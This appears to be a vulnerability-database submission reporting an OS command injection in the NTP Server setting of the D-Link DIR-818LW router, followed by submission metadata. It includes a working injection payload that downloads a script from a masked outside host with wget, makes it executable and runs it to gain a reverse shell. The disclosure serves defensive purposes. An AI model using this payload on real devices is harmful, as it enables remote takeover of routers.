| Title | D-LINK DIR-818LW HW:B1 OS Command Injection |
|---|
| Description | In the D-Link router model DIR-818LW, there is a Remote Code Execution (RCE) vulnerability located in the "Management > System Time" submenu, specifically in the "NTP Server" parameter. This field is intended to configure the server from which the router retrieves time synchronization data. However, it is possible to inject a malicious payload into this field, allowing the execution of arbitrary commands and ultimately achieving a reverse shell in Bash.
script: eixicgrg; (test -e /tmp/n.sh || wget http://xxx.xxx.xxx.xxx:xxxx/n.sh -O /tmp/n.sh; chmod 777 /tmp/n.sh; /tmp/n.sh &); |
|---|
| Source | ⚠️ http://x.x.x.x/info/Login.html |
|---|
| User | Havook (UID 71104) |
|---|
| Submission | 07/12/2025 10:18 (11 months ago) |
|---|
| Moderation | 07/12/2025 20:44 (10 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 316251 [D-Link DIR-818LW up to 20191215 System Time Page NTP Server os command injection] |
|---|
| Points | 20 |
|---|